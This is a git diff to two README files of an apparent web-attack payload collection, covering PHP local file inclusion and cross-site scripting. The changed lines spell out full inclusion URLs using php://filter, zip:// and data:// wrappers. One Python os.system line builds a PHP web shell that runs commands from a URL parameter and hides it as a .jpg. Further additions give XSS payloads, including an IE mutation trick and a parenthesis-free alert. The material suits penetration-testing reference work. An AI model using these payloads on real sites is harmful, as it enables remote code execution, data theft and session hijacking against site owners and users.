diff --git a/PHP include/README.md b/PHP include/README.md
index 2e95014..4ff991e 100644
--- a/PHP include/README.md	
+++ b/PHP include/README.md	
@@ -13,15 +13,15 @@ http://example.com/index.php?page=%252e%252e%252f
 
 LFI Wrapper rot13 and base64
 ```
-php://filter/read=string.rot13/resource=
-php://filter/convert.base64-encode/resource=
+http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
+http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 ```
 
 LFI Wrapper zip
 ```python
 os.system("echo \"</pre><?php system($_GET['cmd']); ?></pre>\" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php")
 				
-zip://shell.jpg%23payload.php
+http://example.com/index.php?page=zip://shell.jpg%23payload.php
 ```
 
 
@@ -31,9 +31,9 @@ http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbW
 ```
 
 
-XSS via RFI/LFI with "<svg onload=alert(1)>" payload
+XSS via RFI/LFI with "<svg<svg onload=alert(1)>onload=alert(1)>" payload
 ```
-data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
+http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
 ```
 
 ## Thanks to
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 23324c0..8dc0918 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -53,6 +53,7 @@ XSS for HTML5
 <video/poster/onerror=alert(1)>
 <video><source onerror="javascript:alert(1)">
 <video src=_ onloadstart="alert(1)">
+<details/open/ontoggle="alert`1`"
 ```
 
 
@@ -130,6 +131,14 @@ XSS in SVG (short)
 more payloads in ./files
 
 
+# Mutated XSS for Browser IE8/IE9
+```
+<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
+<script>alert(document.getElementById('x').innerHTML)</script>
+```
+ IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. 
+
+
 ## Polyglot XSS
 Polyglot XSS - 0xsobky
 ```
@@ -159,6 +168,10 @@ Bypass quotes for string
 String.fromCharCode(88,83,83)
 ```
 
+Bypass parenthesis for string
+```
+alert`1`
+```
 
 ```
 <script>$=1,alert($)</script>